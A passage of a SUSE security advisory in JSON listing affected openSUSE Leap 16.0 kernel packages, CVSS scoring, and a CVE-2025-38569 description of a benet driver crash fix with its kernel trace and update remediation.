"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38551"
},
{
"cve": "CVE-2025-38569",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38569"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbenet: fix BUG when creating VFs\n\nbenet crashes as soon as SRIOV VFs are created:\n\n kernel BUG at mm/vmalloc.c:3457!\n Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n CPU: 4 UID: 0 PID: 7408 Comm: test.sh Kdump: loaded Not tainted 6.16.0+ #1 PREEMPT(voluntary)\n [...]\n RIP: 0010:vunmap+0x5f/0x70\n [...]\n Call Trace:\n \u003cTASK\u003e\n __iommu_dma_free+0xe8/0x1c0\n be_cmd_set_mac_list+0x3fe/0x640 [be2net]\n be_cmd_set_mac+0xaf/0x110 [be2net]\n be_vf_eth_addr_config+0x19f/0x330 [be2net]\n be_vf_setup+0x4f7/0x990 [be2net]\n be_pci_sriov_configure+0x3a1/0x470 [be2net]\n sriov_numvfs_store+0x20b/0x380\n kernfs_fop_write_iter+0x354/0x530\n vfs_write+0x9b9/0xf60\n ksys_write+0xf3/0x1d0\n do_syscall_64+0x8c/0x3d0\n\nbe_cmd_set_mac_list() calls dma_free_coherent() under a spin_lock_bh.\nFix it by freeing only after the lock has been released.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38569",
"url": "https://www.suse.com/security/cve/CVE-2025-38569"
},
{
"category": "external",
"summary": "SUSE Bug 1248384 for CVE-2025-38569",
"url": "https://bugzilla.suse.com/1248384"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
